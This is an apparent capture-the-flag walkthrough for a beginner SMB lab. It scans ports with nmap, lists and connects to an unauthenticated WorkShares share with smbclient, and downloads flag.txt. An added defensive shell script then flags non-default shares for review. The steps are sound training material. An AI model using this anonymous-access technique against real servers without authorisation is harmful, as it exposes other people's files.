First, we check for open ports on the machine (replace ip with the machine's actual IP address):
nmap -Pn ip
The output should include something like:
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Since this challenge is about SMB (Server Message Block), the relevant port is 445. Let's try to list any available shares.
smbclient -L ip
Just hit Enter when prompted for the password.
The output should include something like:
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
WorkShares      Disk
Let's try to connect to any of them. The only poorly configured one will be WorkShares.
smbclient \\\\ip\\WorkShares
Submit your machine's password. You should now be logged in!
Now display available files and folders:
ls
Then navigate into the two folders to see their contents.
cd Amy.J
cd ..
cd James.P
The folder James.P should contain a file called flag.txt, which we want to extract.
get flag.txt
Then exit the shell (Ctrl + C) and check the contents of flag.txt:
cat flag.txt
Copy and paste the string. Finished!
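From the defender's side, the share listing step is where a share like WorkShares stands out. The following is an added example, not part of the original walkthrough: a shell filter that reads `smbclient -L` output and prints the Disk shares that are not default administrative shares, which are the ones to review for guest access. The function names and the sample listing (including the "Team Docs" share) are constructed for illustration.

```shell
#!/bin/sh
# Added example: list the Disk shares in `smbclient -L` output that are not
# default administrative shares (ADMIN$, C$, ... all end in "$").
# Whatever remains is a custom share whose access settings deserve review.

# custom_disk_shares: reads a share listing on stdin, prints one name per line.
custom_disk_shares() {
    awk '
        # The table body starts after the dashed line under "Sharename".
        $1 ~ /^-+$/ { in_table = 1; next }
        # A blank line ends the table (status lines may follow it).
        in_table && NF == 0 { in_table = 0; next }
        in_table {
            # Share names may contain spaces, so collect fields until the
            # Type column (Disk, IPC or Printer) is reached.
            name = ""
            for (i = 1; i <= NF; i++) {
                if (i > 1 && ($i == "Disk" || $i == "IPC" || $i == "Printer")) {
                    if ($i == "Disk" && name !~ /\$$/) print name
                    break
                }
                name = (name == "" ? $i : name " " $i)
            }
        }
    '
}

# Constructed sample listing, same shape as the output shown in the walkthrough.
sample_listing() {
    cat <<'EOF'

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk
        Team Docs       Disk      Constructed name with a space

SMB1 disabled -- no workgroup available
EOF
}

# Demo run on the constructed sample.
sample_listing | custom_disk_shares
```

To run it against your own server, pipe the output of the share listing command into custom_disk_shares instead of the sample.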